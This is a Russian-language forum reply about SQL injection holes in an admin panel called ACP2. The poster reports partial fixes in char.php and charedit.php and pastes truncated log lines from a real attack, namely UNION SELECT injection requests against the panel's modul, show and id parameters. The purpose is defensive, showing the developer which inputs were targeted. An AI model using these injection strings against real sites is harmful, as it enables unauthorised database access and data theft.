Цитата:
Сообщение от Кот ДаWINчи
Уважаемый, опять одна абстракция! Пожалуйста, ткните мне конкретно, где ОБЫЧНЫЙ пользователь может провести инъекцию. А то хаять все умеем, а вот дельные советы давать...
Я с большим удовольствием приму ваш багрепорт, и внесу изменения в скрипты.
|
частично уже внесено. дырка в char.php заткнута через (int) (хотя я бы не стал на это полагаться, лучше все же через новую переменную и intval()
Дырка в charedit.php (возможно) заткнута через новую проверку, но надо тестировать.
Давать советы дело неблагородное, я лучше кину несколько строк из реально имевшей место атаки. Я себе дырки позатыкал но уже не помню где и как конкретно.
"GET /ACP2/index.php?modul=gilds&page=1&show=66+union+select+ 1--+
"GET /ACP2/index.php?modul=charedit%27+union+select+1--
"GET /ACP2/index.php?modul=char&id=106197+UNION+SELECT+1/* HTTP/1.1"
"GET /ACP2/index.php?modul=char&id=106197)+and+1=union+select +*+from--
"GET /ACP2/index.php?modul=char&id=106197)+union
select+*+fr om(select+*+from(select+name_const(
"GET /ACP2/index.php?modul=char&id=-999.9%20UNION%20ALL%20SELECT%200x31303235343830303 536
строки не окончены, они длинные. но понять куда и как целились можно.